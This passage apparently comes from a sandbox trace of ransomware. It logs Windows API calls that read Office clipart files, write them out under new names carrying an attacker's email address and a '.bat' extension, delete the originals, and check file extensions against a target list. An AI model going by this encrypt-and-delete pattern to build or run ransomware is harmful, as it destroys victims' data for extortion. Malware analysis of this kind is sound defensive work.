hTemplateFile=0x0) returned 0x36c [0183.206] GetLastError () returned 0x0 [0183.206] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2b64, lpOverlapped=0x0) returned 1 [0183.208] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2b70, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2b70, lpOverlapped=0x0) returned 1 [0183.209] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.209] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.209] SetEndOfFile (hFile=0x36c) returned 1 [0183.209] CloseHandle (hObject=0x36c) returned 1 [0183.209] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.209] SetEndOfFile (hFile=0x364) returned 1 [0183.210] CloseHandle (hObject=0x364) returned 1 [0183.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.210] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf")) returned 1 [0183.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 68 [0183.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 68 [0183.211] lstrlenW (lpString=".doc") returned 4 [0183.211] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.211] lstrlenW (lpString=".docx") returned 5 [0183.211] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.211] lstrlenW (lpString=".pdf") returned 4 [0183.211] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.211] lstrlenW (lpString=".xls") returned 4 [0183.211] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.211] lstrlenW (lpString=".xlsx") returned 5 [0183.211] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.211] lstrlenW (lpString=".ppt") returned 4 [0183.211] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 68 [0183.211] lstrlenW (lpString=".zip") returned 4 [0183.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.211] lstrlenW (lpString=".rar") returned 4 [0183.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.211] lstrlenW (lpString=".bz2") returned 4 [0183.211] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.211] lstrlenW (lpString=".7z") returned 3 [0183.211] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 68 [0183.211] lstrlenW (lpString=".dbf") returned 4 [0183.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 68 [0183.212] lstrlenW (lpString=".1cd") returned 4 [0183.212] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 68 [0183.212] lstrlenW (lpString=".jpg") returned 4 [0183.212] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.212] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.212] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0183.213] GetLastError () returned 0x0 [0183.213] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3734, lpOverlapped=0x0) returned 1 [0183.214] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3740, lpOverlapped=0x0) returned 1 [0183.216] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.216] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.216] SetEndOfFile (hFile=0x36c) returned 1 [0183.216] CloseHandle (hObject=0x36c) returned 1 [0183.216] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.216] SetEndOfFile (hFile=0x364) returned 1 [0183.217] CloseHandle (hObject=0x364) returned 1 [0183.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.217] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf")) returned 1 [0183.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 68 [0183.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 68 [0183.218] lstrlenW (lpString=".doc") returned 4 [0183.218] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.218] lstrlenW (lpString=".docx") returned 5 [0183.218] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.218] lstrlenW (lpString=".pdf") returned 4 [0183.218] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.218] lstrlenW (lpString=".xls") returned 4 [0183.218] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.218] lstrlenW (lpString=".xlsx") returned 5 [0183.218] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.218] lstrlenW (lpString=".ppt") returned 4 [0183.218] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 68 [0183.218] lstrlenW (lpString=".zip") returned 4 [0183.218] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.218] lstrlenW (lpString=".rar") returned 4 [0183.218] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.218] lstrlenW (lpString=".bz2") returned 4 [0183.218] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.218] lstrlenW (lpString=".7z") returned 3 [0183.218] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 68 [0183.218] lstrlenW (lpString=".dbf") returned 4 [0183.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 68 [0183.219] lstrlenW (lpString=".1cd") returned 4 [0183.219] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 68 [0183.219] lstrlenW (lpString=".jpg") returned 4 [0183.219] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.219] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.219] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0183.220] GetLastError () returned 0x0 [0183.220] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x347c, lpOverlapped=0x0) returned 1 [0184.075] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3480, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3480, lpOverlapped=0x0) returned 1 [0184.077] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.077] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.077] SetEndOfFile (hFile=0x36c) returned 1 [0184.077] CloseHandle (hObject=0x36c) returned 1 [0184.077] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.077] SetEndOfFile (hFile=0x364) returned 1 [0184.078] CloseHandle (hObject=0x364) returned 1 [0184.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf")) returned 1 [0184.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 68 [0184.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 68 [0184.079] lstrlenW (lpString=".doc") returned 4 [0184.079] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.079] lstrlenW (lpString=".docx") returned 5 [0184.079] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.079] lstrlenW (lpString=".pdf") returned 4 [0184.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.080] lstrlenW (lpString=".xls") returned 4 [0184.080] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.080] lstrlenW (lpString=".xlsx") returned 5 [0184.080] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.080] lstrlenW (lpString=".ppt") returned 4 [0184.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 68 [0184.080] lstrlenW (lpString=".zip") returned 4 [0184.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.080] lstrlenW (lpString=".rar") returned 4 [0184.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.080] lstrlenW (lpString=".bz2") returned 4 [0184.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.080] lstrlenW (lpString=".7z") returned 3 [0184.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 68 [0184.080] lstrlenW (lpString=".dbf") returned 4 [0184.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 68 [0184.080] lstrlenW (lpString=".1cd") returned 4 [0184.080] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF") returned 68 [0184.080] lstrlenW (lpString=".jpg") returned 4 [0184.080] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.081] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.081] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0184.081] GetLastError () returned 0x0 [0184.081] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x40cc, lpOverlapped=0x0) returned 1 [0184.084] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x40d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x40d0, lpOverlapped=0x0) returned 1 [0184.085] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.086] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.086] SetEndOfFile (hFile=0x36c) returned 1 [0184.086] CloseHandle (hObject=0x36c) returned 1 [0184.086] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.086] SetEndOfFile (hFile=0x364) returned 1 [0184.087] CloseHandle (hObject=0x364) returned 1 [0184.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.088] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf")) returned 1 [0184.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 68 [0184.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 68 [0184.088] lstrlenW (lpString=".doc") returned 4 [0184.088] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.088] lstrlenW (lpString=".docx") returned 5 [0184.088] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.088] lstrlenW (lpString=".pdf") returned 4 [0184.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.089] lstrlenW (lpString=".xls") returned 4 [0184.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.089] lstrlenW (lpString=".xlsx") returned 5 [0184.089] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.089] lstrlenW (lpString=".ppt") returned 4 [0184.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 68 [0184.089] lstrlenW (lpString=".zip") returned 4 [0184.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.089] lstrlenW (lpString=".rar") returned 4 [0184.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.089] lstrlenW (lpString=".bz2") returned 4 [0184.089] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.089] lstrlenW (lpString=".7z") returned 3 [0184.089] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 68 [0184.089] lstrlenW (lpString=".dbf") returned 4 [0184.089] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 68 [0184.089] lstrlenW (lpString=".1cd") returned 4 [0184.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 68 [0184.089] lstrlenW (lpString=".jpg") returned 4 [0184.089] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.090] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.090] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0184.091] GetLastError () returned 0x0 [0184.091] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2ce4, lpOverlapped=0x0) returned 1 [0184.103] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2cf0, lpOverlapped=0x0) returned 1 [0184.105] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.105] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.105] SetEndOfFile (hFile=0x36c) returned 1 [0184.105] CloseHandle (hObject=0x36c) returned 1 [0184.105] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.105] SetEndOfFile (hFile=0x364) returned 1 [0184.106] CloseHandle (hObject=0x364) returned 1 [0184.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.106] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf")) returned 1 [0184.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 68 [0184.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 68 [0184.107] lstrlenW (lpString=".doc") returned 4 [0184.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.108] lstrlenW (lpString=".docx") returned 5 [0184.108] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.108] lstrlenW (lpString=".pdf") returned 4 [0184.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.108] lstrlenW (lpString=".xls") returned 4 [0184.108] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.108] lstrlenW (lpString=".xlsx") returned 5 [0184.108] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.108] lstrlenW (lpString=".ppt") returned 4 [0184.108] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 68 [0184.108] lstrlenW (lpString=".zip") returned 4 [0184.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.108] lstrlenW (lpString=".rar") returned 4 [0184.108] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.108] lstrlenW (lpString=".bz2") returned 4 [0184.108] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.108] lstrlenW (lpString=".7z") returned 3 [0184.108] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 68 [0184.108] lstrlenW (lpString=".dbf") returned 4 [0184.108] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 68 [0184.109] lstrlenW (lpString=".1cd") returned 4 [0184.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 68 [0184.109] lstrlenW (lpString=".jpg") returned 4 [0184.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.109] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.109] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0184.110] GetLastError () returned 0x0 [0184.110] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x7680, lpOverlapped=0x0) returned 1 [0184.113] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x7690, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x7690, lpOverlapped=0x0) returned 1 [0184.115] ReadFile (in: hFile=0x364, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.115] WriteFile (in: hFile=0x36c, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.115] SetEndOfFile (hFile=0x36c) returned 1 [0184.115] CloseHandle (hObject=0x36c) returned 1 [0184.115] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.115] SetEndOfFile (hFile=0x364) returned 1 [0184.116] CloseHandle (hObject=0x364) returned 1 [0184.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.117] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf")) returned 1 [0184.117] lstrlenW (lpString="C:\\Program Files\\Microsoft 